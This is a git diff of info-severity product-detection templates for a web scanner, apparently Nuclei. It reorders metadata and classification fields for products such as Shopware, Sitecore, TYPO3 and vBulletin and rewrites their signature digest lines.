cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 200 -# digest: 4a0a0047304502207ca5079a2f0c74cbd6b9594958e360176f50fc609bf9de0c27bfdd93f78df544022100f40278d7ff54983742c56073d73db238786d79942ec91b1ccd52c4b1c93924cb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207ca5079a2f0c74cbd6b9594958e360176f50fc609bf9de0c27bfdd93f78df544022100f40278d7ff54983742c56073d73db238786d79942ec91b1ccd52c4b1c93924cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/shopware-detect.yaml b/http/technologies/shopware-detect.yaml index 509f4ed89c..be8e179bc5 100644 --- a/http/technologies/shopware-detect.yaml +++ b/http/technologies/shopware-detect.yaml @@ -8,16 +8,16 @@ info: reference: - https://github.com/shopware/shopware - https://github.com/shopware/platform + classification: + cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"shopware AG" - product: shopware vendor: shopware + product: shopware + shodan-query: title:"shopware AG" tags: tech,shopware,cms - classification: - cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,4 @@ http: status: - 200 -# digest: 4b0a00483046022100f5dedd7b164741bfc8676fe3df4689ec6b74c8c244be4938643ad3ab1806755e02210093c10795b77bb72b7baafa642dca97b240e8c8ebfbf98e9c42e51c1c4cfc6697:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f5dedd7b164741bfc8676fe3df4689ec6b74c8c244be4938643ad3ab1806755e02210093c10795b77bb72b7baafa642dca97b240e8c8ebfbf98e9c42e51c1c4cfc6697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/simplesamlphp-detect.yaml b/http/technologies/simplesamlphp-detect.yaml index cd67a94029..97c5ed9ba7 100644 --- a/http/technologies/simplesamlphp-detect.yaml +++ b/http/technologies/simplesamlphp-detect.yaml @@ -8,16 +8,16 @@ info: SimpleSAMLphp was detected. reference: - https://simplesamlphp.org/ + classification: + cpe: cpe:2.3:a:simplesamlphp:simplesamlphp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: "http.title:\"SimpleSAMLphp installation page\"" - product: simplesamlphp vendor: simplesamlphp + product: simplesamlphp + shodan-query: "http.title:\"SimpleSAMLphp installation page\"" tags: tech,simplesamlphp,detect - classification: - cpe: cpe:2.3:a:simplesamlphp:simplesamlphp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,11 +25,11 @@ http: - "{{BaseURL}}/module.php/core/frontpage_welcome.php" stop-at-first-match: true - matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_any(to_lower(body), "you have successfully installed simplesamlphp", "simplesamlphp installation page", "/module.php/core/login-admin.php")' condition: and -# digest: 4b0a004830460221008947ba7ebb0debe88119bad4ee31ab76e2aef6d84723058966d9508693062a91022100cdf298c84060a7365624019fdf4f9bd78b3d16c4ffd62e7ad7aec035ede9cc97:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221008947ba7ebb0debe88119bad4ee31ab76e2aef6d84723058966d9508693062a91022100cdf298c84060a7365624019fdf4f9bd78b3d16c4ffd62e7ad7aec035ede9cc97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/sitecore-cms.yaml b/http/technologies/sitecore-cms.yaml index 78040e3107..c3b252c5c3 100644 --- a/http/technologies/sitecore-cms.yaml +++ b/http/technologies/sitecore-cms.yaml @@ -8,16 +8,16 @@ info: Detect Sitecore Content Management System (CMS) websites based on a redirect from the sitecore media handler URL pattern to the notfound.aspx page. reference: | https://www.sitecore.com + classification: + cpe: cpe:2.3:a:sitecore:cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"sitecore" - product: cms vendor: sitecore + product: cms + shodan-query: title:"sitecore" tags: cms,sitecore,tech - classification: - cpe: cpe:2.3:a:sitecore:cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 302 -# digest: 4a0a00473045022100f0c832c2edd97e823cf892321f6d33feb8ab05f2343a70d8c87eeba946e01912022070ec4b59a10f79d3bfd970eed2955383c076eea9ebacb2780cee7a73407393b8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f0c832c2edd97e823cf892321f6d33feb8ab05f2343a70d8c87eeba946e01912022070ec4b59a10f79d3bfd970eed2955383c076eea9ebacb2780cee7a73407393b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/smartstore-detect.yaml b/http/technologies/smartstore-detect.yaml index 376af8bd5e..aa5438216d 100644 --- a/http/technologies/smartstore-detect.yaml +++ b/http/technologies/smartstore-detect.yaml @@ -6,15 +6,15 @@ info: severity: info reference: - https://github.com/smartstore/SmartStoreNET - metadata: - max-request: 1 - shodan-query: http.html:'content="Smartstore' - product: smartstore - vendor: smartstore - tags: tech,smartstore,oss - classification: cpe: cpe:2.3:a:smartstore:smartstore:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: smartstore + product: smartstore + shodan-query: http.html:'content="Smartstore' + tags: tech,smartstore,oss + http: - method: GET path: @@ -38,4 +38,4 @@ http: regex: - '<meta name="generator" content="Smartstore (.*)" />' -# digest: 4a0a00473045022018a8bf80686d606487628b98a556864708b3e41d09ac2125c7b49dd65a7ce794022100f9709ab85ec5ebe2358b9f3bb10818003a36e06d2e1efcc8639d6f6b1c15df0d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022018a8bf80686d606487628b98a556864708b3e41d09ac2125c7b49dd65a7ce794022100f9709ab85ec5ebe2358b9f3bb10818003a36e06d2e1efcc8639d6f6b1c15df0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/sogo-detect.yaml b/http/technologies/sogo-detect.yaml index 9f2581ad51..d652c17e80 100644 --- a/http/technologies/sogo-detect.yaml +++ b/http/technologies/sogo-detect.yaml @@ -7,16 +7,16 @@ info: description: This template will detect a running SOGo instance reference: - https://www.sogo.nu/ + classification: + cpe: cpe:2.3:a:alinto:sogo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.title:"SOGo" - product: sogo vendor: alinto + product: sogo + shodan-query: http.title:"SOGo" tags: sogo,tech - classification: - cpe: cpe:2.3:a:alinto:sogo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4a0a0047304502210086cd277a5f6f1488af70eda52044fbbdc23fdea0de4d17e983b5690e12f1902f02206396093d422c25596b3af15dfafe520463208f0582f25c4d7a1554db16c4be4a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210086cd277a5f6f1488af70eda52044fbbdc23fdea0de4d17e983b5690e12f1902f02206396093d422c25596b3af15dfafe520463208f0582f25c4d7a1554db16c4be4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml index e6a0770856..ed4adad70d 100644 --- a/http/technologies/statamic-detect.yaml +++ b/http/technologies/statamic-detect.yaml @@ -8,16 +8,16 @@ info: Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites. reference: - https://github.com/statamic/cms + classification: + cpe: cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "Statamic" - product: statamic vendor: statamic + product: statamic + shodan-query: "Statamic" tags: tech,statamic,detect - classification: - cpe: cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: part: header regex: - 'X-Powered-By:(.*)Statamic' -# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/subrion-cms-detect.yaml b/http/technologies/subrion-cms-detect.yaml index bf156e5e20..6bf1dc99a2 100644 --- a/http/technologies/subrion-cms-detect.yaml +++ b/http/technologies/subrion-cms-detect.yaml @@ -4,16 +4,16 @@ info: name: Subrion CMS Detect author: pikpikcu severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Subrion" - fofa-query: title="subrion" - product: subrion - vendor: intelliants - tags: subrion,tech - classification: cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: intelliants + product: subrion + shodan-query: http.component:"Subrion" + fofa-query: title="subrion" + tags: subrion,tech + http: - method: GET path: @@ -32,4 +32,4 @@ http: status: - 200 -# digest: 4a0a00473045022027bac5306a75de09a6697c0888b73fc16a327a8e28b3eb8efcb22f434f6dedf40221008d448c9cfce0c968fb57ef765b50802f57c258ac3a21efb70ad44aa66211e060:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022027bac5306a75de09a6697c0888b73fc16a327a8e28b3eb8efcb22f434f6dedf40221008d448c9cfce0c968fb57ef765b50802f57c258ac3a21efb70ad44aa66211e060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/tibco-businessconnect-detect.yaml b/http/technologies/tibco-businessconnect-detect.yaml index d88aa0886f..c75562cad6 100644 --- a/http/technologies/tibco-businessconnect-detect.yaml +++ b/http/technologies/tibco-businessconnect-detect.yaml @@ -8,16 +8,16 @@ info: TIBCO BusinessConnect technology was detected. reference: - https://www.tibco.com/products/tibco-businessconnect + classification: + cpe: cpe:2.3:a:tibco:businessconnect:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"TIBCO BusinessConnect" - product: businessconnect vendor: tibco + product: businessconnect + shodan-query: http.html:"TIBCO BusinessConnect" tags: tibco,detect,tech - classification: - cpe: cpe:2.3:a:tibco:businessconnect:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - 'status_code == 200' - 'contains(header, "TIBCO BusinessConnect")' condition: and -# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/tibco-spotfire-services-detect.yaml b/http/technologies/tibco-spotfire-services-detect.yaml index 3a5574e781..75fc1ce76a 100644 --- a/http/technologies/tibco-spotfire-services-detect.yaml +++ b/http/technologies/tibco-spotfire-services-detect.yaml @@ -8,16 +8,16 @@ info: TIBCO Spotfire Statistics Services was detected. reference: - https://docs.tibco.com/products/tibco-spotfire-statistics-services + classification: + cpe: cpe:2.3:a:tibco:spotfire_statistics_services:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 - shodan-query: "TIBCO Spotfire Server" - product: spotfire_statistics_services vendor: tibco + product: spotfire_statistics_services + shodan-query: "TIBCO Spotfire Server" tags: tech,tibco,detect - classification: - cpe: cpe:2.3:a:tibco:spotfire_statistics_services:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: group: 1 regex: - 'Version\s+([0-9.\s\(\)V]+)' -# digest: 4a0a00473045022100b9c1d679fef17c6ab5d3a49b8d140da5b95bd33f5ec3066f51c131733cb8671302203c738559c63ec2502eed182a3af5e63a57e8f8931ebf750e49c7c4d0d5c8ad43:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100b9c1d679fef17c6ab5d3a49b8d140da5b95bd33f5ec3066f51c131733cb8671302203c738559c63ec2502eed182a3af5e63a57e8f8931ebf750e49c7c4d0d5c8ad43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml index d8100b3ea7..6e235e5010 100644 --- a/http/technologies/tinyproxy-detect.yaml +++ b/http/technologies/tinyproxy-detect.yaml @@ -8,16 +8,16 @@ info: Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems reference: - https://github.com/tinyproxy/tinyproxy + classification: + cpe: cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "Server: tinyproxy" - product: tinyproxy vendor: tinyproxy_project + product: tinyproxy + shodan-query: "Server: tinyproxy" tags: tech,proxy,detect - classification: - cpe: cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: kval kval: - server -# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/typo3-detect.yaml b/http/technologies/typo3-detect.yaml index 2fddb0de99..708d4c37cc 100644 --- a/http/technologies/typo3-detect.yaml +++ b/http/technologies/typo3-detect.yaml @@ -4,15 +4,15 @@ info: name: TYPO3 Detection author: dadevel severity: info - metadata: - max-request: 1 - shodan-query: http.component:"TYPO3" - product: typo3 - vendor: typo3 - tags: tech,typo3 - classification: cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: typo3 + product: typo3 + shodan-query: http.component:"TYPO3" + tags: tech,typo3 + http: - method: GET path: @@ -34,4 +34,4 @@ http: words: - '<meta name="generator" content="TYPO3' -# digest: 4b0a00483046022100df4e17a3e2741c69d8bfcbeec9ea51e10df61828b3d3107c6c09f5e3749d45000221008e06d967a62b188303fa1b970b2c83cd939c5b372bbc4afbdfa41a3935d09784:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100df4e17a3e2741c69d8bfcbeec9ea51e10df61828b3d3107c6c09f5e3749d45000221008e06d967a62b188303fa1b970b2c83cd939c5b372bbc4afbdfa41a3935d09784:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/utility-service-detect.yaml b/http/technologies/utility-service-detect.yaml index ad41ea7162..2489634c0f 100644 --- a/http/technologies/utility-service-detect.yaml +++ b/http/technologies/utility-service-detect.yaml @@ -4,16 +4,16 @@ info: name: Utility Services Administration - Detect author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:avaya:aura_utility_services:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Utility Services Administration" - product: aura_utility_services vendor: avaya + product: aura_utility_services + shodan-query: title:"Utility Services Administration" tags: tech,avaya,aura - classification: - cpe: cpe:2.3:a:avaya:aura_utility_services:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,4 @@ http: status: - 200 -# digest: 4a0a00473045022100e57c6e9b2403c6440136c4052ef0e08048c00c484c2fcaa42bcb5f47fd793d5202202013ddf52086e4811e3b5dd26fd69cfcc7f217f4c622155a43efefa0ab53e4ee:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e57c6e9b2403c6440136c4052ef0e08048c00c484c2fcaa42bcb5f47fd793d5202202013ddf52086e4811e3b5dd26fd69cfcc7f217f4c622155a43efefa0ab53e4ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/vbulletin-detect.yaml b/http/technologies/vbulletin-detect.yaml index 2dd52aaee4..5c651ad2fd 100644 --- a/http/technologies/vbulletin-detect.yaml +++ b/http/technologies/vbulletin-detect.yaml @@ -7,17 +7,17 @@ info: description: vBulletin is a proprietary forum and community publishing software written in PHP. reference: - https://www.vbulletin.com/ + classification: + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: vbulletin + product: vbulletin shodan-query: title:"Powered By vBulletin" google-query: intext:"Powered By vBulletin" - product: vbulletin - vendor: vbulletin tags: tech,vbulletin - classification: - cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -44,4 +44,4 @@ http: - '(?i)meta.name=.generator.*content=.vbulletin.([\d.|\d]+)' - '(?i)\*.vBulletin.([\d.|\d]+).CSS' -# digest: 4b0a00483046022100c0c5f1bc5bc014454e00e0e538be652648abb599315a9720e3d5fcbb160eb02b02210087a18452e4696d25f41ceed2e600a8c78f37d14fa51557f53d70893b1cc7546d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c0c5f1bc5bc014454e00e0e538be652648abb599315a9720e3d5fcbb160eb02b02210087a18452e4696d25f41ceed2e600a8c78f37d14fa51557f53d70893b1cc7546d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/versa/versa-analytics-server.yaml b/http/technologies/versa/versa-analytics-server.yaml index 9afa4b5a40..7a8052fc40 100644 --- a/http/technologies/versa/versa-analytics-server.yaml +++ b/http/technologies/versa/versa-analytics-server.yaml @@ -6,16 +6,16 @@ info: severity: info reference: - https://versa-networks.com/products/components/ + classification: + cpe: cpe:2.3:a:versa-networks:versa_analytics:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "Versa-Analytics-Server" - product: versa_analytics vendor: versa-networks + product: versa_analytics + shodan-query: "Versa-Analytics-Server" tags: tech,versa,analytics - classification: - cpe: cpe:2.3:a:versa-networks:versa_analytics:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,4 @@ http: kval: - Server -# digest: 4b0a00483046022100bfabd660aa5307b823fd14926746fba2603dac53c2c7c07de3bb2d02a8e4d9ce02210093f0ad3085d807064a76f4e27e0feb9625c322c92a7597ade03859bbf950bd2a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bfabd660aa5307b823fd14926746fba2603dac53c2c7c07de3bb2d02a8e4d9ce02210093f0ad3085d807064a76f4e27e0feb9625c322c92a7597ade03859bbf950bd2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/versa/versa-director-api.yaml b/http/technologies/versa/versa-director-api.yaml index 957ad7d470..e82c6c5268 100644 --- a/http/technologies/versa/versa-director-api.yaml +++ b/http/technologies/versa/versa-director-api.yaml @@ -7,16 +7,16 @@ info: description: Versa Director API Endpoint (Unauthorized) Detection reference: - https://versa-networks.com/products/components/ + classification: + cpe: cpe:2.3:a:versa-networks:versa_director:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Versa Networks" - product: versa_director vendor: versa-networks + product: versa_director + shodan-query: html:"Versa Networks" tags: api,versa,tech - classification: - cpe: cpe:2.3:a:versa-networks:versa_director:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 401 -# digest: 4b0a00483046022100e229eb5d84def3a3b79048003f546d8f3c558dff0cc70f7c1b58bb1fc430bb2d022100bd5f07601566a246eb302c1155740fc73aa30795b425f83240bd7e90ce8183e7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e229eb5d84def3a3b79048003f546d8f3c558dff0cc70f7c1b58bb1fc430bb2d022100bd5f07601566a246eb302c1155740fc73aa30795b425f83240bd7e90ce8183e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/versa/versa-networks-detect.yaml b/http/technologies/versa/versa-networks-detect.yaml index 6ad5ffc272..a01421d545 100644 --- a/http/technologies/versa/versa-networks-detect.yaml +++ b/http/technologies/versa/versa-networks-detect.yaml @@ -6,16 +6,16 @@ info: severity: info reference: - https://versa-networks.com/products/components/ + classification: + cpe: cpe:2.3:a:versa-networks:versa_analytics:*:*:*:*:*:*:*:* metadata: verified: true max-request: 7 - shodan-query: html:"Versa Networks" - product: versa_analytics vendor: versa-networks + product: versa_analytics + shodan-query: html:"Versa Networks" tags: tech,versa - classification: - cpe: cpe:2.3:a:versa-networks:versa_analytics:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: - "status_code==200 && (\"2033952700\" == mmh3(base64_py(body)))" condition: or -# digest: 490a00463044022073727bfe428dc68d01ab28f8094d76f2e53323f856d13580948caf899066b34e02203e42d2c797fb23715438e957763facf8cecc3ee4035de5b2d7e95d76dc638fc7:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022073727bfe428dc68d01ab28f8094d76f2e53323f856d13580948caf899066b34e02203e42d2c797fb23715438e957763facf8cecc3ee4035de5b2d7e95d76dc638fc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/vivotex-web-console-detect.yaml b/http/technologies/vivotex-web-console-detect.yaml index ab7109e0a3..cdd3fd133b 100644 --- a/http/technologies/vivotex-web-console-detect.yaml +++ b/http/technologies/vivotex-web-console-detect.yaml @@ -4,16 +4,16 @@ info: name: VIVOTEK Web Console Detect author: pikpikcu severity: info - metadata: - max-request: 1 - shodan-query: title:"VIVOTEK Web Console" - fofa-query: app="VIVOTEK-Web-Console" - product: ip7361 - vendor: vivotek - tags: tech,vivotex,console - classification: cpe: cpe:2.3:h:vivotek:ip7361:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: vivotek + product: ip7361 + shodan-query: title:"VIVOTEK Web Console" + fofa-query: app="VIVOTEK-Web-Console" + tags: tech,vivotex,console + http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 4a0a0047304502210096b769d86486a32b8b5bdd4a8d130d446a9aa63432b9d1ea0f114d8c1bde91d40220048081315443a5c342708ee322c65d276659a09eb26f44c86a77794d10f5c1c0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210096b769d86486a32b8b5bdd4a8d130d446a9aa63432b9d1ea0f114d8c1bde91d40220048081315443a5c342708ee322c65d276659a09eb26f44c86a77794d10f5c1c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/vmware/vmware-horizon-version.yaml b/http/technologies/vmware/vmware-horizon-version.yaml index 3f3082cbc2..be0809d6a7 100644 --- a/http/technologies/vmware/vmware-horizon-version.yaml +++ b/http/technologies/vmware/vmware-horizon-version.yaml @@ -4,16 +4,16 @@ info: name: Vmware Horizon Version Detect author: veshraj severity: info + classification: + cpe: cpe:2.3:a:vmware:horizon_view:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Vmware Horizon" - product: horizon_view vendor: vmware + product: horizon_view + shodan-query: title:"Vmware Horizon" tags: vmware,tech - classification: - cpe: cpe:2.3:a:vmware:horizon_view:*:*:*:*:*:*:*:* http: - method: GET path: @@ -24,4 +24,4 @@ http: regex: - '"clientVersion":"[^"]*"' -# digest: 490a0046304402200faa5cdc8f7f4a1b51e25e35691756abd8df4ae9d364783acd04a444ec9b997602202246fd95abc5cc2b03f438afe83d8724aa67e766445f21beeec97386dea9b74e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200faa5cdc8f7f4a1b51e25e35691756abd8df4ae9d364783acd04a444ec9b997602202246fd95abc5cc2b03f438afe83d8724aa67e766445f21beeec97386dea9b74e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wing-ftp-service-detect.yaml b/http/technologies/wing-ftp-service-detect.yaml index 9c4b94a44d..54b20454f8 100644 --- a/http/technologies/wing-ftp-service-detect.yaml +++ b/http/technologies/wing-ftp-service-detect.yaml @@ -6,16 +6,16 @@ info: severity: info description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. + classification: + cpe: cpe:2.3:a:wftpserver:wing_ftp_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "Wing FTP Server" - product: wing_ftp_server vendor: wftpserver + product: wing_ftp_server + shodan-query: "Wing FTP Server" tags: tech,ftp,wing,detect - classification: - cpe: cpe:2.3:a:wftpserver:wing_ftp_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +26,5 @@ http: part: header words: - "Wing FTP Server" -# digest: 4b0a00483046022100f10f68fc40d77bd9d1d477fcb141f9a3aa3759aa19af1d46cb13162352e3a7520221008ed11cdb28af81f4949dffa122ccd3fab3cf3ccba97be4993ed4696a67540203:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f10f68fc40d77bd9d1d477fcb141f9a3aa3759aa19af1d46cb13162352e3a7520221008ed11cdb28af81f4949dffa122ccd3fab3cf3ccba97be4993ed4696a67540203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wms-server-detect.yaml b/http/technologies/wms-server-detect.yaml index 64fce98c14..6bffba276d 100644 --- a/http/technologies/wms-server-detect.yaml +++ b/http/technologies/wms-server-detect.yaml @@ -4,16 +4,16 @@ info: name: Wms-Server detect author: pikpikcu severity: info + classification: + cpe: cpe:2.3:a:wms_project:wms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="WmsServer" - product: wms vendor: wms_project + product: wms + fofa-query: app="WmsServer" tags: tech,wms,httpserver - classification: - cpe: cpe:2.3:a:wms_project:wms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +25,4 @@ http: words: - "WMSServer/" -# digest: 490a0046304402204152ecaf03336e4327c6f6a0676e0c8f6ba0a010c846d8d8674ed713d25f925c02207f98bc1b82e2c23e22e5cd210cfaf10e6001ab78b3e1df660b7db9ea541e5c64:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204152ecaf03336e4327c6f6a0676e0c8f6ba0a010c846d8d8674ed713d25f925c02207f98bc1b82e2c23e22e5cd210cfaf10e6001ab78b3e1df660b7db9ea541e5c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml index 04515e46ab..68cea7dac6 100644 --- a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml @@ -8,16 +8,16 @@ info: - Checks for Bricks Builder Theme versions. reference: - https://0day.today/exploit/description/39489 + classification: + cpe: cpe:2.3:a:bricksbuilder:bricks:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 - publicwww-query: "/wp-content/themes/bricks/" - product: bricks vendor: bricksbuilder + product: bricks + publicwww-query: "/wp-content/themes/bricks/" tags: wordpress,theme,wp-theme,wp,bricks - classification: - cpe: cpe:2.3:a:bricksbuilder:bricks:*:*:*:*:wordpress:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009c78d037f624ed7c52cb7fdf8a4bf76d529fed8e880d6cbc8ec5e31d5857e38a0221008e34473c003bb6105607aac0fc1397eb9764f9ec081a7114e6f4983d11522afb:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009c78d037f624ed7c52cb7fdf8a4bf76d529fed8e880d6cbc8ec5e31d5857e38a0221008e34473c003bb6105607aac0fc1397eb9764f9ec081a7114e6f4983d11522afb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/xenforo-detect.yaml b/http/technologies/xenforo-detect.yaml index 7072b60742..0140208d0d 100644 --- a/http/technologies/xenforo-detect.yaml +++ b/http/technologies/xenforo-detect.yaml @@ -4,15 +4,15 @@ info: name: XenForo Forum Detection author: dhiyaneshDk,daffainfo severity: info - metadata: - max-request: 1 - shodan-query: http.title:"XenForo" - product: xenforo - vendor: xenforo - tags: tech,xenforo - classification: cpe: cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: xenforo + product: xenforo + shodan-query: http.title:"XenForo" + tags: tech,xenforo + http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 4b0a00483046022100e9e9c5ec74730991fa8ae02a5b7980d8293a48e8f3f469fec876bfcad4c413cb022100850f27a5868007ce42df79c08aeaf8d64dfa5070493633f6db50ea00fd780d5e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e9e9c5ec74730991fa8ae02a5b7980d8293a48e8f3f469fec876bfcad4c413cb022100850f27a5868007ce42df79c08aeaf8d64dfa5070493633f6db50ea00fd780d5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/xerox-workcentre-detect.yaml b/http/technologies/xerox-workcentre-detect.yaml index 2e25129d7c..225103765d 100644 --- a/http/technologies/xerox-workcentre-detect.yaml +++ b/http/technologies/xerox-workcentre-detect.yaml @@ -4,16 +4,16 @@ info: name: Xerox Workcentre Detect author: pussycat0x severity: info + classification: + cpe: cpe:2.3:h:xerox:workcentre_7970i:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"XEROX WORKCENTRE" - product: workcentre_7970i vendor: xerox + product: workcentre_7970i + shodan-query: title:"XEROX WORKCENTRE" tags: tech,xerox,workcentre - classification: - cpe: cpe:2.3:h:xerox:workcentre_7970i:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,4 @@ http: 